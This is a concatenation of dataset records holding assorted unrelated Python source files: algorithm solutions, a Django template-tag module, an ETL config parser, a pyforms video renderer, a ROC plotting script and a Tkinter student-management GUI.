    \"\"\"\n\n # Act & Assert\n act_and_assert(source_markdown, expected_gfm, expected_tokens)\n","repo_name":"jackdewinter/pymarkdown","sub_path":"test/gfm/test_markdown_thematic_breaks.py","file_name":"test_markdown_thematic_breaks.py","file_ext":"py","file_size_in_byte":10623,"program_lang":"python","lang":"en","doc_type":"code","stars":49,"dataset":"github-code","pt":"34"} +{"seq_id":"73776601057","text":"n,m=map(int,input().split()) #행과 열\nb=[] #행과 열을 받을 입력 값 리스트\nc=[] #결과값\nfor i in range(n): \n c.append([])\n b.append(list(map(int,input().split()))) #입력값\n c[i]=[0]*m #각 행마다 m만큼의 0값 만들기\nc[0][0]=b[0][0] #시작점은 고정 시켜줌\nfor j in range(1,m): #첫 번째 줄(0행)은 어차피 비교할 값이 없으므로\n c[0][j]=b[0][j]+c[0][j-1] #각 각의 값을 더해줌. -->이때 b값 넣어주는거 주의\nfor j in range(1,n): #첫 번째 0열도 마찬가지로 비교할 값이 없으므로\n c[j][0]=b[j][0]+c[j-1][0] # 각 각의 값을 더해줌\nfor i in range(1,n): #이제 1행1열부터 비교하면됨. 대각선만 더하는 것은 어차피 값이 더 작으므로 의미가 없음\n for j in range(1,m): \n if c[i-1][j]>=c[i][j-1]: #+1행과 +1열 한 값을 비교해서 더 큰 값을\n c[i][j]=b[i][j]+c[i-1][j]#i,j에 넣어 주면 됨.\n else:\n c[i][j]=b[i][j]+c[i][j-1]\nprint(c[n-1][m-1]) #그렇게하면 최댓값이 나\n","repo_name":"goodlucky1215/algorithm","sub_path":"4.백준/11048.py","file_name":"11048.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"18586510025","text":"import pyforms\nfrom pyforms \t\t import BaseWidget\nfrom pyforms.controls import ControlText\nfrom pyforms.controls import ControlProgress\nfrom pyforms.controls import ControlSlider\nfrom pyforms.controls import ControlCombo\nfrom pyforms.controls import ControlButton\nfrom pyforms.controls import ControlImage\nfrom pyforms.controls import ControlPlayer\nfrom pyforms.controls import ControlFile\nfrom dolphinrender.render_positions import RenderPositions\n\nimport cv2, os\n\nclass DolphinRender(BaseWidget):\n\t\n\tdef __init__(self):\n\t\tsuper(DolphinRender,self).__init__('Dolphin render')\n\n\t\tself.set_margin(5)\n\n\t\tself._sceneFile \t= ControlFile('Scene file')\n\n\t\tself._video0 \t\t= ControlFile('Video 0')\n\t\tself._video1 \t\t= ControlFile('Video 1')\n\t\tself._data \t\t\t= ControlFile('Data')\n\t\t\n\t\tself._outputfile \t= ControlText('Output movie')\n\t\t\n\t\tself._exc_btn \t\t= ControlButton('Run')\t\t\n\t\t\n\t\tself.formset = [\n\t\t\t'_sceneFile',\n\t\t\t('_video0', '_video1'),\n\t\t\t('_data', '_outputfile'),\n\t\t\t'_exc_btn'\n\t\t]\n\n\t\tself._data.changed_changed = self.__data_changed\n\t\tself._exc_btn.value \t\t\t\t= self.execute\n\n\n\t\t\"\"\"\n\t\tself._sceneFile.value \t= '/home/ricardo/Downloads/golfinhos/2013.11.23_10.59_scene.obj'\n\t\tself._video0.value \t\t= '/home/ricardo/Downloads/golfinhos/2013.11.23_10.59_Entrada.MP4'\n\t\tself._video1.value \t\t= '/home/ricardo/Downloads/golfinhos/2013.11.23_10.59_Cascata.MP4'\n\t\tself._data.value\t\t= '/home/ricardo/bitbucket/3dengine-project/d-track/output/2013.11.23_10.59_scene_3d_tracking.csv'\n\t\t\"\"\"\n\t\t\n\n\tdef __data_changed(self): \n\t\thead, \t\ttail \t \t = os.path.split(self._data.value)\n\t\tfilename, \textention \t = os.path.splitext(tail)\n\t\tself._outputfile.value = \"{0}_resume.avi\".format(filename)\n\n\n\tdef execute(self):\n\t\tSCENE_FILE \t= self._sceneFile.value\n\t\tVIDEO0 \t\t= self._video0.value\n\t\tVIDEO1 \t\t= self._video1.value\n\n\t\tif not os.path.exists('output'): os.makedirs('output')\n\n\t\t\n\t\toutVideoFilename = os.path.join('output', self._outputfile.value)\n\t\toutvideo = cv2.VideoWriter(outVideoFilename, cv2.VideoWriter_fourcc('M','J','P','G'), 30, (1920, 480))\n\t\trun = RenderPositions(SCENE_FILE, self._data.value,VIDEO0, VIDEO1, videowriter = outvideo)\n\t\trun.startScene()\n\n\ndef main(): pyforms.start_app( DolphinRender, geometry=(100,100,900, 180) )\n\nif __name__ == \"__main__\": main()\n\n\"\"\"\n\tSCENE_FILE = '/home/ricardo/subversion/MEShTracker/Dolphin/DOLPHINS/New Videos/2012.12.01_13.48/2012.12.01_13.48_scene.obj'\n\tVIDEO0 = '/home/ricardo/subversion/MEShTracker/Dolphin/DOLPHINS/New Videos/2012.12.01_13.48/2012.12.01_13.48_Entrada (1).MP4'\n\tVIDEO1 = '/home/ricardo/subversion/MEShTracker/Dolphin/DOLPHINS/New Videos/2012.12.01_13.48/2012.12.01_13.48_Cascata (1).MP4'\n\n\tSCENE_FILE = '/home/ricardo/subversion/MEShTracker/Dolphin/DOLPHINS/New Videos/2013.03.16_12.18/2013.03.16_12.18_scene.obj'\n\tVIDEO0 = '/home/ricardo/subversion/MEShTracker/Dolphin/DOLPHINS/New Videos/2013.03.16_12.18/2013 03 16 12 18_Entrada.MP4'\n\tVIDEO1 = '/home/ricardo/subversion/MEShTracker/Dolphin/DOLPHINS/New Videos/2013.03.16_12.18/2013 03 16 12 18_Cascata.MP4'\n\t\n\tif not os.path.isfile(VIDEO0): \t\tprint 'file does not exists \\n',VIDEO0\n\tif not os.path.isfile(VIDEO1): \t\tprint 'file does not exists \\n',VIDEO1\n\tif not os.path.isfile(SCENE_FILE): \tprint 'file does not exists \\n',SCENE_FILE\n\n\t#SCENE_FILE = '/home/ricardo/subversion/MEShTracker/Dolphin/DOLPHINS/New Videos/2013.03.16_12.18/2013.03.16_12.18_scene2render.obj'\n\t#VIDEO0 = '/home/ricardo/subversion/MEShTracker/Dolphin/DOLPHINS/New Videos/2013.03.16_12.18/2013 03 16 12 18_Entrada.MP4'\n\t#VIDEO1 = '/home/ricardo/subversion/MEShTracker/Dolphin/DOLPHINS/New Videos/2013.03.16_12.18/2013 03 16 12 18_Cascata.MP4'\n\toutvideo = cv2.VideoWriter('3dscene.avi', cv2.cv.CV_FOURCC('M','J','P','G'), 30, (1920, 480))\n\trun = RenderPositions(SCENE_FILE,'output/2013 03 16 12 18.csv',VIDEO0, VIDEO1,videowriter = outvideo)\n\trun.startScene()\n\n\t#run.loadData()\n\t#while True: run.process()\n\"\"\"","repo_name":"UmSenhorQualquer/d-track","sub_path":"dolphinrender/DolphinRender.py","file_name":"DolphinRender.py","file_ext":"py","file_size_in_byte":3894,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"30689820610","text":"# Time : O(n) ; Space : O(n)\n\nclass Solution:\n def mostCompetitive(self, nums: List[int], k: int) -> List[int]:\n out = [] \n for i,n in enumerate(nums):\n while out and out[-1] > n and k-len(out)+i < len(nums):\n out.pop() \n out.append(n)\n return out[:k]","repo_name":"Dharaneeshwar/Leetcode","sub_path":"1673. Find the Most Competitive Subsequence DC(21-1-21).py","file_name":"1673. Find the Most Competitive Subsequence DC(21-1-21).py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"34"} +{"seq_id":"11427742185","text":"import logging\nimport json\nimport configparser\n\nlogger = logging.getLogger(__name__)\n\ndef json_extract(json_data):\n \"\"\"\n function gets the input json and extract the data tag and returns it\n :param json_data:\n :return: data tag of the json.\n \"\"\"\n if json_data:\n return json.loads(json_data)['data']\n\ndef config_parser():\n \"\"\"\n reads the config.txt and load input file and database connection details.\n \n :return: dictionary having input file and database details\n \n \"\"\"\n config_dict = {'Input-file' :\n {\n 'filepath' : \"\" ,\n 'fileprefix': \"\",\n 'processing_directory': \"\"\n },\n 'database-connection' :\n {\n 'dbname': '',\n 'host': '',\n 'password': '',\n 'port': 5432,\n 'user': ''\n }\n }\n configParser = configparser.RawConfigParser()\n configFilePath = r'.\\config\\config.txt'\n configParser.read(configFilePath)\n\n\n for key,value in config_dict.items():\n for lk in value.keys():\n config_dict[key][lk] = configParser.get(key,lk)\n\n return config_dict\n\n\n\n\ndef get_formatted_dict(data):\n \"\"\"\n function get input json/dictionary extract all the tag/attribute mentioned in config.txt file and return a dictionary having all the input fields.\n in case a field is not found in the input it will replace it with default value mentioned in mapping.txt\n\n :param data: a line in input file in json/dict format.\n :return: Dictionary having required fields for table insert.\n \"\"\"\n tag_to_attr_mapping, col_to_def_value = load_mapping()\n\n for tag in tag_to_attr_mapping.keys():\n try:\n col_to_def_value[tag_to_attr_mapping[tag]] = data[tag]\n\n except KeyError:\n pass\n\n return col_to_def_value\n\ndef load_mapping():\n \"\"\"\n this function will read each colon separated line of config file.\n it will create two dictionary.\n 1. Mapping of the json tag to internal attribute name/column name.\n 2. Mapping of tag to default value in case tag is not found in json.\n\n :return:\n tag_to_attr_mapping : type Dict : contains mapping of the json tag to internal attribute name/column name.\n tag_to_def_value : type Dict : Mapping of tag to default value in case tag is not found in json.\n\n \"\"\"\n #TODO instead of config file replace it with yaml\n tag_to_attr_mapping = {}\n col_to_def_value = {}\n with open(\".\\config\\mapping.txt\",\"r\") as config_file:\n for line in config_file:\n if line[0] == \"#\": #to ignore comments in the config file.\n continue\n try:\n tag, default_value, column_name = line.rstrip(\"\\n\").split(\":\")\n tag_to_attr_mapping[tag] = column_name\n col_to_def_value[column_name] = default_value\n\n except ValueError as e:\n logger.error(\"Got {} for line {}\".format(e,line))\n raise\n return tag_to_attr_mapping, col_to_def_value\n\n\n\ndef business_logic(data):\n \"\"\"\n place holder to implement business logic related parsing. all the code/calls to functions related to business logic will be here.\n\n :return:\n data : type dict : modified dictionary after applying logic\n \"\"\"\n try:\n # append first_name and last_name to store full name\n data['contact_person'] = data['first_name'] + \" \" + data['last_name']\n\n #append country code to phone numbers\n if data['mobile_number'] !=\"\" and data['mobile_number'][0] != '+' :\n data['mobile_number'] = data['mobile_country'] + data['mobile_number'].replace(\" \",\"\")\n if data['phone_number'] !=\"\" and data['phone_number'][0] != '+':\n data['phone_number'] = data['phone_country'] + data['phone_number'].replace(\" \",\"\")\n\n # if heating cost is not included in service charge, increment service charge with heating cost\n if data['heating_cost_in_service'] == \"NO\":\n #print(data['service_charge'],data['heating_cost'])\n data['service_charge'] = int(data['service_charge']) + int(data['heating_cost'])\n\n\n\n except KeyError as e:\n logger.error(\"Got {} for {}\".format(e,e.args))\n raise\n return data\n\ndef get_insert_query():\n \"\"\"\n function to return all the insert query. keeping it inside parser as names of the parameter are mentioned inside query.\n\n :return:\n query : type string : all the insert query with name of the bind parameters.\n \"\"\"\n\n query = \"\"\"\n \n INSERT into \n fact_flat \n (flat_id, city, agency_id, apartment_type, apartment_size, base_rent, total_rent, rent_scope, number_of_rooms) \n VALUES \n (%(flat_id)s, %(city)s, %(agency_id)s, %(apartment_type)s,%(apartment_size)s, %(base_rent)s, %(total_rent)s, %(rent_scope)s, %(number_of_rooms)s);\n INSERT into \n dim_flat_address \n (flat_id, house_number, street, quarter, city, region, flat_longitude, flat_latitude, post_code) \n VALUES \n (%(flat_id)s, %(house_number)s, %(street)s, %(quarter)s, %(city)s,%(region)s, %(flat_longitude)s, %(flat_latitude)s, %(post_code)s);\n INSERT into \n dim_agency \n (agency_id, company, city, house_number, post_code, street, mobile_number, email, contact_person, phone_number) \n VALUES \n (%(agency_id)s,%(company)s, %(agency_city)s, %(agency_house_number)s, %(agency_post_code)s, %(agency_street)s, %(mobile_number)s, %(email)s, %(contact_person)s, %(phone_number)s) ON CONFLICT (agency_id) DO NOTHING;\n INSERT into \n dim_flat_details\n (flat_id, heating_cost, service_charge, construction_year, refurbishment_year, flat_condition, number_of_floor, garden_available, guest_toilet_available, lift_available,pets_allowed) \n VALUES \n (%(flat_id)s, %(heating_cost)s, %(service_charge)s, %(construction_year)s, %(refurbishment_year)s, %(flat_condition)s, %(number_of_floor)s, %(garden_available)s, %(guest_toilet_available)s,%(lift_available)s,%(pets_allowed)s);\n INSERT into \n dim_flat_metadata \n (flat_id, state, creation_date, modify_date) \n VALUES \n (%(flat_id)s, %(state)s, %(creation_date)s, %(modify_date)s);\n \n \"\"\"\n return query\n\nif __name__ == \"__main__\":\n #print(load_config())\n #print(business_logic({\"first_name\":\"sachin\",\"last_name\":\"vyas\"}))\n #print(business_logic({\"first_name\": \"sachin\", \"lst_name\": \"vyas\"}))\n print(config_parser())","repo_name":"kislerdm/RealStateListing_etl","sub_path":"config/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":6916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"9309638828","text":"from django import template\nfrom django.utils.safestring import mark_safe\nfrom django.template.defaultfilters import stringfilter\nfrom django.core.urlresolvers import reverse_lazy\nfrom pypandoc import convert\n\nregister = template.Library()\n\n@register.filter\ndef get_item(dictionary, key):\n return dictionary.get(key)\n\n@register.filter\n@stringfilter\ndef pandoc(text, level=\"1\"):\n return mark_safe(convert(\n text,\n 'html',\n format='md',\n extra_args=['--mathjax',\n '--base-header-level='+level,\n ],\n ))\n\n\n@register.filter\n@stringfilter\ndef content_pandoc(text, level=\"1\"):\n return mark_safe(convert(\n text,\n 'html',\n format='md',\n extra_args=['--mathjax',\n '--base-header-level='+level,\n '--number-sections',\n # '--toc',\n # '--toc-depth=6',\n '--id-prefix=content',\n # '-s',\n ],\n ))\n\n@register.simple_tag\ndef is_started_class(lesson, user):\n effectives = lesson.effective_lessons\n liste = effectives.filter(author=user)\n if liste.exists():\n return mark_safe(\"started\")\n else:\n return mark_safe(\"not-yet\")\n\n@register.simple_tag\ndef href_open_or_not(lesson, user):\n effectives = lesson.effective_lessons\n liste = effectives.filter(author=user)\n if liste.exists():\n return mark_safe(\n \"\"\"\"\"\" % reverse_lazy('oral:detail', args=(user.username, lesson.num))\n )\n else:\n return \"\"\n\n@register.simple_tag\ndef href_close_or_not(lesson, user):\n effectives = lesson.effective_lessons\n liste = effectives.filter(author=user)\n if liste.exists():\n return mark_safe(\"\")\n else:\n return \"\"\n\n@register.simple_tag\ndef put_create_link(lesson, user):\n effectives = lesson.effective_lessons\n liste = effectives.filter(author=user)\n if liste.exists():\n return \"\"\n else:\n return mark_safe(\n \"\"\"Créer\"\"\" % reverse_lazy(\n 'oral:create_lesson',\n args=(user.username, lesson.num)\n )\n )\n\n","repo_name":"ErkanNarmanli/agreg_maths","sub_path":"oral/templatetags/agreg_extra.py","file_name":"agreg_extra.py","file_ext":"py","file_size_in_byte":2652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"6289833982","text":"class IsHappyNumber:\n def isHappy(self, n: int) -> bool:\n visited = set()\n\n while n not in visited:\n nextn = 0\n visited.add(n)\n while n != 0:\n n, v = divmod(n, 10)\n nextn += pow(v, 2)\n n = nextn\n\n return n == 1\n\nif __name__ == '__main__':\n init = IsHappyNumber()\n print(init.isHappy(19))\n print(init.isHappy(3))\n","repo_name":"arunma/DataStructuresAlgorithmsPython","sub_path":"lastmile/leetcode/apple/IsHappyNumber.py","file_name":"IsHappyNumber.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"6728301379","text":"# -*- coding:utf-8 -*-\n\nfrom socket import *\n\nimport time\n\nclient_list = []\n\nfor i in range(11):\n client = socket(AF_INET, SOCK_STREAM)\n client.connect((\"127.0.0.1\", 8080))\n client_list.append(client)\n msg = \"GET / HTTP/1.1\"\n client.send(msg.encode(\"utf-8\"))\n print(client.recv(1024))\n\nfor client in client_list:\n time.sleep(0.5)\n client.close()\n","repo_name":"iditgqs/learn_python_3","sub_path":"02-python核心编程/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"16696260468","text":"import urllib\nimport copy\n\n\nclass RobotFileEats(object):\n\n def __init__(self, contents=None):\n self.__entries = []\n self.__contents = contents\n self.__parse(contents)\n\n def __parse(self, contents):\n \"\"\"parse the input lines from a robots.txt file.\n We allow that a user-agent: line is not preceded by\n one or more blank lines.\"\"\"\n lines = contents.split(\"\\n\")\n for line in lines:\n i = line.find('#')\n if i >= 0:\n line = line[:i]\n line = line.strip()\n if not line:\n continue\n line = line.split(':', 1)\n if len(line) == 2:\n line[1] = urllib.unquote(line[1].strip())\n if line[0] == \"User-agent\":\n self._add_entry(\"User-agent\", line[1])\n elif line[0] == \"Disallow\":\n self._add_entry(\"Disallow\", line[1])\n\n elif line[0] == \"Allow\":\n self._add_entry(\"Allow\", line[1])\n\n elif line[0] == \"Sitemap\":\n self._add_entry(\"Sitemap\", line[1])\n\n def _add_entry(self, entry, value):\n self.__entries.append({\"entry\": entry, \"value\": value})\n\n @property\n def entries(self):\n return copy.deepcopy(self.__entries)\n\n def __str__(self):\n return self.__contents\n\n","repo_name":"Etiqa/eats","sub_path":"eats/utils/robots.py","file_name":"robots.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"28434438658","text":"class Solution:\n def canVisitAllRooms(self, rooms: List[List[int]]) -> bool:\n from collections import deque\n size = len(rooms)\n\n visited = set()\n #visited.add(0)\n keys = set()\n keys.add(0)\n\n while keys:\n key = keys.pop()\n visited.add(key)\n new_keys = rooms[key]\n for k in new_keys:\n if k not in visited:\n keys.add(k)\n\n\n return len(visited) == size","repo_name":"sudarshaana/my_leetcode","sub_path":"keys-and-rooms/keys-and-rooms.py","file_name":"keys-and-rooms.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"10099863995","text":"#!/bin/python3\n\n\"\"\"\nPlots a ROC curve of one or more classficiation results.\n\nAuthor: Patrik Goldschmidt (igoldschmidt@fit.vut.cz)\nAuthor: Jan Kučera (jan.kucera@cesnet.cz)\nDate: 2023-07-09\nProject: Windower: Feature Extraction for Real-Time DDoS Detection Using ML\nRepository: https://github.com/xGoldy/Windower\n\"\"\"\n\nimport argparse\nimport logging\n\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport seaborn as sns\nimport sklearn.metrics\n\nimport utils\n\nlogger = logging.getLogger(__name__)\n\nparser = argparse.ArgumentParser()\nparser.add_argument('rmses', metavar='RMSES', nargs='+', type=str,\n help='rmse input files to plot')\nparser.add_argument('-n', '--names', metavar='NAMES', nargs='+', type=str,\n default=['Autoencoder'],\n help='names to plot')\nparser.add_argument('-c', '--colors', metavar='COLORS', nargs='+', type=str,\n default=['darkorange'],\n help='colors to plot')\nparser.add_argument('-L', '--labels', metavar='LABELS', type=str,\n help='labels input file')\nparser.add_argument('-o', '--output', metavar='OUTFILE', type=str,\n default='output.png',\n help='path to write PNG output file')\nparser.add_argument('-l', '--log-level', type=str,\n default='info',\n help='logging level (error, info, debug, ...)')\n\nargs = parser.parse_args()\n\n# Set logging level\nlogging.basicConfig(level=args.log_level.upper())\n\n# ROC plotting function\ndef print_roc(output, labels, rmses) -> None:\n for data in rmses:\n fprs, tprs, threshs = sklearn.metrics.roc_curve(labels, data['rmses'])\n auc = sklearn.metrics.auc(fprs, tprs)\n plt.plot(fprs, tprs, data['color'], label=f\"{data['name']} (AUC=%0.2f)\" % auc)\n\n plt.plot([0, 1], [0, 1], \"darkgray\", linestyle='dashed', label=\"Chance level (AUC=0.5)\")\n plt.axis(\"square\")\n plt.xlabel(\"False Positive Rate (FPR)\")\n plt.ylabel(\"True Positive Rate (TPR)\")\n plt.legend()\n plt.savefig(output, bbox_inches='tight')\n\n# Load label data\nlogger.info(f\"loading {args.labels}\")\nutils.check_file(args.labels, ext=\"txt\")\nlabel_data = pd.read_csv(args.labels, names=['y_true'])\nlogger.info(f\"loaded {args.labels}, {len(label_data)} records\")\n\nplot_data = []\nfor (file, name, color) in zip(args.rmses, args.names, args.colors):\n\n # Load RMSE data\n logger.info(f\"name {name}, color {color}\")\n logger.info(f\"loading {file}\")\n utils.check_file(file, ext=\"rmse\")\n rmses_data = pd.read_csv(file, names=['losses'])\n logger.info(f\"loaded {file}, {len(rmses_data)} records\")\n\n assert(len(label_data) == len(rmses_data))\n\n plot_data.append({\n 'file': file,\n 'rmses': rmses_data,\n 'name': name,\n 'color': color,\n })\n\nprint_roc(args.output, label_data, plot_data)\n","repo_name":"xGoldy/Windower","sub_path":"src/utils/plot/run-roc.py","file_name":"run-roc.py","file_ext":"py","file_size_in_byte":2710,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"21108777669","text":"from tkinter import*\nfrom PIL import Image, ImageTk\n\n\nclass Developer:\n def __init__(self, root):\n self.root = root\n self.root.geometry(\"1530x790+0+0\")\n self.root.configure(bg=\"#e6fae1\")\n self.root.title(\"Student Management System Developer Window\")\n\n # First header image\n\n img1 = Image.open(\"images/mh1.jpg\")\n img1 = img1.resize((510, 130), Image.ANTIALIAS)\n self.photoimg1 = ImageTk.PhotoImage(img1)\n\n f_lbl = Label(self.root, image=self.photoimg1)\n f_lbl.place(x=0, y=0, width=510, height=130)\n\n # Middle header image\n\n img2 = Image.open(\"images/mh2.jpg\")\n img2 = img2.resize((520, 130), Image.ANTIALIAS)\n self.photoimg2 = ImageTk.PhotoImage(img2)\n\n f_lbl = Label(self.root, image=self.photoimg2)\n f_lbl.place(x=510, y=0, width=510, height=130)\n\n # Third header image\n\n img3 = Image.open(\"images/mh3.jpg\")\n img3 = img3.resize((520, 130), Image.ANTIALIAS)\n self.photoimg3 = ImageTk.PhotoImage(img3)\n\n f_lbl = Label(self.root, image=self.photoimg3)\n f_lbl.place(x=1020, y=0, width=520, height=130)\n\n# <----------- image frame for background of remaining window except header window -------------->\n img4 = Image.open(\"images/bgmain4.jpg\")\n img4 = img4.resize((1530, 710), Image.ANTIALIAS)\n self.photoimg4 = ImageTk.PhotoImage(img4)\n\n bg_img = Label(self.root, image=self.photoimg4)\n bg_img.place(x=0, y=130, width=1530, height=710)\n\n title_lbl = Label(bg_img, text=\"Developer Of Project Student Management System By Facial Recognition \", font=(\n \"'Fredoka One', sans-serif\", 30, \"bold\"), bg=\"#b0c4de\", fg=\"blue\")\n title_lbl.place(x=0, y=0, width=1530, height=50)\n\n # Creating s sub frame inside the image frame\n main_frame = Frame(bg_img, bd=2)\n main_frame.place(x=0, y=52, width=1530, height=650)\n\n # inside the sub frame we create another frame\n\n # Left frame\n Left_frame = LabelFrame(\n main_frame, bd=2, relief=RIDGE, text=\"Developer Window\", font=(\n \"'Fredoka One', sans-serif\", 12, \"bold\"), fg=\"blue\")\n Left_frame.place(x=0, y=0, width=750, height=597)\n\n # profile Image\n\n profile_img = Image.open(\"images/akhil1.jpg\")\n profile_img = profile_img.resize((150, 150), Image.ANTIALIAS)\n self.photoprofile_img = ImageTk.PhotoImage(profile_img)\n\n f_lbl = Label(Left_frame, image=self.photoprofile_img)\n f_lbl.place(x=300, y=0, width=150, height=150)\n\n developer_info = LabelFrame(\n Left_frame, bd=0, relief=RIDGE, text=\"\", font=(\n \"'Fredoka One', sans-serif\", 11, \"bold\"), fg=\"blue\")\n developer_info.place(x=200, y=190, width=545, height=350)\n\n # for name\n\n dev_name = Label(developer_info, text=\"Name\", font=(\n \"'Fredoka One', sans-serif\", 12, \"bold\"), fg=\"red\")\n dev_name.grid(row=0, column=0, padx=10, pady=10, sticky=W)\n\n dev_name1 = Label(developer_info, text=\": Akhilesh Yadav\", font=(\n \"'Fredoka One', sans-serif\", 12, \"bold\"), fg=\"Green\")\n dev_name1.grid(row=0, column=1, padx=10, pady=10, sticky=W)\n\n # for graduation\n\n dev_graduatin = Label(developer_info, text=\"Graduation\", font=(\n \"'Fredoka One', sans-serif\", 12, \"bold\"), fg=\"red\")\n dev_graduatin.grid(row=1, column=0, padx=10, pady=10, sticky=W)\n\n dev_graduatin1 = Label(developer_info, text=\": Bachelor Of Technology\", font=(\n \"'Fredoka One', sans-serif\", 12, \"bold\"), fg=\"Green\")\n dev_graduatin1.grid(row=1, column=1, padx=10, pady=10, sticky=W)\n\n # Stream\n dev_stream = Label(developer_info, text=\"Stream\", font=(\n \"'Fredoka One', sans-serif\", 12, \"bold\"), fg=\"red\")\n dev_stream.grid(row=2, column=0, padx=10, pady=10, sticky=W)\n\n dev_stream1 = Label(developer_info, text=\": Computer Science and Engineering\", font=(\n \"'Fredoka One', sans-serif\", 12, \"bold\"), fg=\"Green\")\n dev_stream1.grid(row=2, column=1, padx=10, pady=10, sticky=W)\n\n # Office\n dev_office = Label(developer_info, text=\"Office\", font=(\n \"'Fredoka One', sans-serif\", 12, \"bold\"), fg=\"red\")\n dev_office.grid(row=3, column=0, padx=10, pady=10, sticky=W)\n\n dev_office = Label(developer_info, text=\": Kanpur,Utter Pradesh\", font=(\n \"'Fredoka One', sans-serif\", 12, \"bold\"), fg=\"Green\")\n dev_office.grid(row=3, column=1, padx=10, pady=10, sticky=W)\n\n # Phone\n\n dev_phone = Label(developer_info, text=\"Phone\", font=(\n \"'Fredoka One', sans-serif\", 12, \"bold\"), fg=\"red\")\n dev_phone.grid(row=4, column=0, padx=10, pady=10, sticky=W)\n\n dev_phone1 = Label(developer_info, text=\": +919616588637\", font=(\n \"'Fredoka One', sans-serif\", 12, \"bold\"), fg=\"Green\")\n dev_phone1.grid(row=4, column=1, padx=10, pady=10, sticky=W)\n\n # email\n\n dev_email = Label(developer_info, text=\"Email\", font=(\n \"'Fredoka One', sans-serif\", 12, \"bold\"), fg=\"red\")\n dev_email.grid(row=5, column=0, padx=10, pady=10, sticky=W)\n\n dev_email1 = Label(developer_info, text=\": yadavakhilesh201616@gmail.com\", font=(\n \"'Fredoka One', sans-serif\", 12, \"bold\"), fg=\"Green\")\n dev_email1.grid(row=5, column=1, padx=10, pady=10, sticky=W)\n\n # Right frame\n Right_frame = LabelFrame(\n main_frame, bd=2, relief=RIDGE, text=\"Python Library and other Funcion Used in this Project\", font=(\n \"'Fredoka One', sans-serif\", 12, \"bold\"), fg=\"blue\")\n Right_frame.place(x=760, y=0, width=760, height=595)\n\n developer_skills = LabelFrame(\n Right_frame, bd=2, relief=RIDGE, text=\"\", font=(\n \"'Fredoka One', sans-serif\", 11, \"bold\"), fg=\"blue\")\n developer_skills.place(x=0, y=0, width=750, height=570)\n\n\n# Files used in thhis project\n\n dev_files = Label(developer_skills, text=\"Files\", font=(\n \"'Fredoka One', sans-serif\", 12, \"bold\"), fg=\"red\")\n dev_files.grid(row=0, column=0, padx=10, pady=10, sticky=W)\n\n dev_files1 = Label(developer_skills, text=\": main.py\", font=(\n \"'Fredoka One', sans-serif\", 12, \"bold\"), fg=\"Green\")\n dev_files1.grid(row=0, column=1, padx=10, pady=10, sticky=W)\n\n dev_files2 = Label(developer_skills, text=\", student.py\", font=(\n \"'Fredoka One', sans-serif\", 12, \"bold\"), fg=\"Green\")\n dev_files2.grid(row=0, column=2, padx=10, pady=10, sticky=W)\n\n dev_files3 = Label(developer_skills, text=\", train.py\", font=(\n \"'Fredoka One', sans-serif\", 12, \"bold\"), fg=\"Green\")\n dev_files3.grid(row=0, column=3, padx=10, pady=10, sticky=W)\n\n dev_files4 = Label(developer_skills, text=\", developer.py\", font=(\n \"'Fredoka One', sans-serif\", 12, \"bold\"), fg=\"Green\")\n dev_files4.grid(row=0, column=4, padx=10, pady=10, sticky=W)\n dev_files5 = Label(developer_skills, text=\", attendence.py\", font=(\n \"'Fredoka One', sans-serif\", 12, \"bold\"), fg=\"Green\")\n dev_files5.grid(row=0, column=5, padx=10, pady=10, sticky=W)\n\n# Technical skills\n\n dev_tech = Label(developer_skills, text=\"Technical Skills\", font=(\n \"'Fredoka One', sans-serif\", 12, \"bold\"), fg=\"red\")\n dev_tech.grid(row=1, column=0, padx=10, pady=10, sticky=W)\n # skills\n dev_tech1 = Label(developer_skills, text=\": Python\", font=(\n \"'Fredoka One', sans-serif\", 12, \"bold\"), fg=\"Green\")\n dev_tech1.grid(row=1, column=1, padx=10, pady=10, sticky=W)\n\n dev_tech2 = Label(developer_skills, text=\", MySQL\", font=(\n \"'Fredoka One', sans-serif\", 12, \"bold\"), fg=\"Green\")\n dev_tech2.grid(row=1, column=2, padx=10, pady=10, sticky=W)\n\n# Library used in this project are\n\n dev_lib = Label(developer_skills, text=\"Library Used\", font=(\n \"'Fredoka One', sans-serif\", 12, \"bold\"), fg=\"red\")\n dev_lib.grid(row=2, column=0, padx=10, pady=10, sticky=W)\n\n dev_lib1 = Label(developer_skills, text=\": NumPy, cv2 ,\", font=(\n \"'Fredoka One', sans-serif\", 12, \"bold\"), fg=\"Green\")\n dev_lib1.grid(row=2, column=1, padx=10, pady=10, sticky=W)\n\n dev_lib2 = Label(developer_skills, text=\",Tkinter, os ,\", font=(\n \"'Fredoka One', sans-serif\", 12, \"bold\"), fg=\"Green\")\n dev_lib2.grid(row=2, column=2, padx=10, pady=10, sticky=W)\n\n dev_lib4 = Label(developer_skills, text=\"PIL , \", font=(\n \"'Fredoka One', sans-serif\", 12, \"bold\"), fg=\"Green\")\n dev_lib4.grid(row=2, column=3, padx=10, pady=10, sticky=W)\n\n dev_lib5 = Label(developer_skills, text=\"mysql.connector , \", font=(\n \"'Fredoka One', sans-serif\", 12, \"bold\"), fg=\"Green\")\n dev_lib5.grid(row=2, column=4, padx=10, pady=10, sticky=W)\n\n dev_lib6 = Label(developer_skills, text=\"csv\", font=(\n 